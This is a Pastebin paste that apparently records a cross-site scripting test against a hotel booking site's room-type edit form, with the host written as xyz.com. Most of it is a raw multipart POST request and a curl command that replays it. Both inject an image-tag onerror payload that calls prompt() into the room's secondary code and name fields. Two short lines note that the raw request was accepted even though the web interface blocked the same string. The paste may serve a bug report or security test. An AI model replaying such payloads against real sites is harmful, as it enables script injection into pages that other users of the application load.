Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- POST /room_types/9378 HTTP/1.1
- Host: xyz.com
- Connection: close
- Content-Length: 2305
- Cache-Control: max-age=0
- sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
- sec-ch-ua-mobile: ?0
- Upgrade-Insecure-Requests: 1
- Origin: https://xyz.com
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuLcZiHUcx5FLD1A8
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Sec-Fetch-Site: same-origin
- Sec-Fetch-Mode: navigate
- Sec-Fetch-User: ?1
- Sec-Fetch-Dest: document
- Referer: https://xyz.com/room_types/edit/9378
- Accept-Encoding: gzip, deflate
- Accept-Language: en-US,en;q=0.5
- Cookie: {{redacted}}
- x-browser: Chrome
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[code]"
- JRS
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="pms-code"
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[secondary_pms_codes][]"
- <img src=a onerror=>
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[secondary_pms_codes][]"
- <img src=a onerror=prompt(`IW`)>
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[number_of_rooms]"
- 0
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[_localized][EN][name]"
- Junior Suite<img src=a>
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[_localized][EN][description]"
- <ul><li>Located on the top floor with a <strong>private balcony and amazing city views</strong></li><li>Enjoy more space with <strong>70 sqm</strong> of living space.</li><li><strong>Separate living room</strong> with comfortable couch.</li><li><strong>Luxury double beds</strong> with down duvets for maximum sleep comfort.</li></ul>
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[_localized][DE][name]"
- Junior Suite<img src=a>
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[_localized][DE][description]"
- <p>• Genießen Sie mehr Platz mit 70 m² Wohnfläche.</p><p>• Separates Wohnzimmer mit bequemer Couch</p><p>• Luxus-Doppelbetten mit Daunendecken für maximalen Schlafkomfort.</p><p>• Zimmer auf der obersten Etage mit eigenem Balkon und herrlichem Blick</p>
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[picture][]"; filename=""
- Content-Type: application/octet-stream
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[picture_position][16962]"
- 1
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[picture_position][16959]"
- 2
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8
- Content-Disposition: form-data; name="room_type[picture_position][16960]"
- 3
- ------WebKitFormBoundaryuLcZiHUcx5FLD1A8--
- I tried myself and the request was accepted too.
- I then tried to submit the same string through the interface and it gets blocked. If I capture the request with Chrome dev tools and try to resubmit, I still get blocked
- curl 'https://xyz.com/room_types/9378' \
- -H 'authority: xyz.com' \
- -H 'cache-control: max-age=0' \
- -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"' \
- -H 'sec-ch-ua-mobile: ?0' \
- -H 'upgrade-insecure-requests: 1' \
- -H 'origin: https://xyz.com' \
- -H 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryBUFTMuBVsE7P1UZv' \
- -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' \
- -H 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
- -H 'sec-fetch-site: same-origin' \
- -H 'sec-fetch-mode: navigate' \
- -H 'sec-fetch-user: ?1' \
- -H 'sec-fetch-dest: document' \
- -H 'referer: https://xyz.com/room_types/edit/9378' \
- -H 'accept-language: en-GB,en-US;q=0.9,en;q=0.8,it;q=0.7,es;q=0.6,de;q=0.5' \
- -H 'cookie: {{redacted}}' \
- --data-raw $'------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[code]"\r\n\r\nJRS\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="pms-code"\r\n\r\n\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[secondary_pms_codes][]"\r\n\r\n<img src=a onerror=prompt(`IW`)>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[number_of_rooms]"\r\n\r\n0\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][EN][name]"\r\n\r\nJunior Suite<img src=a>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][EN][description]"\r\n\r\n<ul><li>Located on the top floor with a <strong>private balcony and amazing city views</strong></li><li>Enjoy more space with <strong>70 sqm</strong> of living space.</li><li><strong>Separate living room</strong> with comfortable couch.</li><li><strong>Luxury double beds</strong> with down duvets for maximum sleep comfort.</li></ul>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][DE][name]"\r\n\r\nJunior Suite<img src=a>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][DE][description]"\r\n\r\n<p>• Genießen Sie mehr Platz mit 70 m² Wohnfläche.</p><p>• Separates Wohnzimmer mit bequemer Couch</p><p>• Luxus-Doppelbetten mit Daunendecken für maximalen Schlafkomfort.</p><p>• Zimmer auf der obersten Etage mit eigenem Balkon und herrlichem Blick</p>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture][]"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture_position][16962]"\r\n\r\n1\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture_position][16959]"\r\n\r\n2\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture_position][16960]"\r\n\r\n3\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv--\r\n' \
- --compressed
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement